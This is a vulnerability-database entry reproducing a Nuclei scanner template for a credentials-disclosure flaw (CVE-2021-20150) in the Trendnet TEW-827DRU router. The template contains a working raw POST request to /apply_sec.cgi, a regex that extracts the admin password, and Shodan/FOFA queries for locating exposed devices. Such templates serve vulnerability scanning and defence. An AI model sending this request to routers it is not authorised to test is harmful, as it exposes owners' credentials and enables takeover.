Lucene search

ProjectDiscoveryNUCLEI:CVE-2021-20150

HistoryFeb 03, 2022 - 9:06 a.m.

Trendnet AC2600 TEW-827DRU - Credentials Disclosure

2022-02-0309:06:04

ProjectDiscovery

github.com

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.5 Medium

AI Score

Confidence

High

0.177 Low

EPSS

Percentile

96.2%

JSON

Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.

id: CVE-2021-20150

info:
  name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
  author: gy741
  severity: medium
  description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
  impact: |
    An attacker can obtain sensitive credentials, leading to unauthorized access to the router.
  remediation: |
    Update the router firmware to the latest version to fix the vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2021-54
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20150
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-20150
    cwe-id: CWE-306
    epss-score: 0.19434
    epss-percentile: 0.95837
    cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: trendnet
    product: tew-827dru_firmware
    shodan-query:
      - http.html:"TEW-827DRU"
      - http.html:"tew-827dru"
    fofa-query: body="tew-827dru"
  tags: cve2021,cve,disclosure,router,tenable,trendnet

http:
  - raw:
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}

        action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ftp_username'
          - 'ftp_password'
          - 'ftp_permission'
          - 'TEW-827DRU'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: password
        group: 1
        regex:
          - '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
        part: body
# digest: 4a0a00473045022100a321be14f14f895f997662ab1f3eb21e49f54f02bb21c499a41c8273bb5ac2610220056a91edd9815b16d3c3471089318a7e0450abb55fd28cdef77f09ea10983476:922c64590222798bb761d5b6d8e72950

References

nvd.nist.gov/vuln/detail/CVE-2021-20150

www.tenable.com/security/research/tra-2021-54

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.5 Medium

AI Score

Confidence

High

0.177 Low

EPSS

Percentile

96.2%

JSON

Related for NUCLEI:CVE-2021-20150